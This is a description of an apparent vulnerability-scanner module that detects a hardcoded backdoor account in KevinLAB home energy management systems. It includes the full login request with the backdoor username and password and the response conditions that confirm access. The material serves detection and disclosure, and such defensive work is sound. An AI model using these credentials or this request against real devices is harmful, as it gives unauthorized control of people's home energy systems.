KevinLAB HEMS - Backdoor Detection

What is the "KevinLAB HEMS - Backdoor Detection?"

The "KevinLAB HEMS - Backdoor Detection" module is designed to detect the presence of an undocumented backdoor account in the KevinLAB Home Energy Management System (HEMS). This module targets the KevinLAB HEMS software and is considered to have a critical severity level. The module was authored by gy741.

Impact

If the backdoor account is present and accessible, an attacker could exploit this vulnerability by logging in using the backdoor account. This unauthorized access could potentially lead to unauthorized control and manipulation of the KevinLAB HEMS system.

How does the module work?

The module works by sending an HTTP request to the targeted KevinLAB HEMS system. The request is designed to simulate a login attempt using the backdoor account credentials. The module then applies a series of matching conditions to determine if the backdoor account is present and accessible.

Example HTTP request:

POST /dashboard/proc.php?type=login HTTP/1.1
Host: <Hostname>
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Connection: close

userid=kevinlab&userpass=kevin003

The module's matching conditions include:

- The presence of a specific HTML tag in the response body: <meta http-equiv="refresh" content="0; url=/>" - The absence of a specific HTML tag in the response body: <script> alert - The presence of a specific header in the response: PHPSESSID - The HTTP response status code being 200

If all of these conditions are met, the module will identify the presence of the backdoor account in the KevinLAB HEMS system.